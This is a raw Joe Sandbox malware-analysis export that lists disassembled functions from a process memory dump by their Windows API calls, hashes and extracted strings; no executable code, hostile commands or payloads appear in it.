                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$X1
                                                                    • API String ID: 4085615965-2139714005
                                                                    • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                    • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                    • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                    • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2485277191-404129466
                                                                    • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                    • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                    • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                    • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                    APIs
                                                                    • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                    • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                    • strncnt.LIBCMT ref: 00428646
                                                                    • strncnt.LIBCMT ref: 0042865A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: strncnt$CompareErrorLastString
                                                                    • String ID:
                                                                    • API String ID: 1776594460-0
                                                                    • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                    • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                    • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                    • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                    APIs
                                                                    • LoadIconW.USER32 ref: 004545DA
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                    • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                    • GetWindowRect.USER32(?,?), ref: 00454688
                                                                    • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                    • GetDesktopWindow.USER32 ref: 00454708
                                                                    • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                    • GetClientRect.USER32(?,?), ref: 0045476F
                                                                    • PostMessageW.USER32 ref: 0045479E
                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                    • String ID:
                                                                    • API String ID: 3869813825-0
                                                                    • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                    • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                    • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                    • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$Info
                                                                    • String ID:
                                                                    • API String ID: 2577412497-0
                                                                    • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                    • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                    • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                    • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateDestroy
                                                                    • String ID: ,$X1$tooltips_class32
                                                                    • API String ID: 1109047481-160040221
                                                                    • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                    • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                    • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                    • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 3993528054-4108050209
                                                                    • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                    • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                    • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                    • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll
                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                    • API String ID: 3832890014-4202584635
                                                                    • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                    • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                    • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                    • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 004669C4
                                                                    • _wcsncpy.LIBCMT ref: 00466A21
                                                                    • _wcsncpy.LIBCMT ref: 00466A4D
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                    • _wcstok.LIBCMT ref: 00466A90
                                                                      • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                    • _wcstok.LIBCMT ref: 00466B3F
                                                                    • _wcscpy.LIBCMT ref: 00466BC8
                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                    • _wcslen.LIBCMT ref: 00466D1D
                                                                    • _memset.LIBCMT ref: 00466BEE
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • _wcslen.LIBCMT ref: 00466D4B
                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                    • String ID: X$HH
                                                                    • API String ID: 3021350936-1944015008
                                                                    • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                    • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                    • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                    • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                    • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                    • CharNextW.USER32(?), ref: 00449361
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                    • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                    • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CharNext
                                                                    • String ID: X1
                                                                    • API String ID: 1350042424-2397719451
                                                                    • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                    • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                    • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                    • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu$Sleep_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1504565804-4108050209
                                                                    • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                    • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                    • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                    • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                    APIs
                                                                    • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                    • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                    • _wcscat.LIBCMT ref: 0045CD51
                                                                    • _wcscat.LIBCMT ref: 0045CD63
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                    • _wcscpy.LIBCMT ref: 0045CE14
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                    • String ID: *.*
                                                                    • API String ID: 1153243558-438819550
                                                                    • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                    • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                    • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                    • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1663942905-4108050209
                                                                    • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                    • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                    • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                    • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1481289235-0
                                                                    • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                    • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                    • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                    • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CursorLoad
                                                                    • String ID:
                                                                    • API String ID: 3238433803-0
                                                                    • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                    • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                    • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                    • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                    • _wcslen.LIBCMT ref: 00460B00
                                                                    • __swprintf.LIBCMT ref: 00460B9E
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                    • GetDlgCtrlID.USER32 ref: 00460CE6
                                                                    • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                    • GetParent.USER32(?), ref: 00460D40
                                                                    • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                    • String ID: %s%u
                                                                    • API String ID: 1899580136-679674701
                                                                    • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                    • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                    • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                    • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                    APIs
                                                                    • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                    • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                    • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
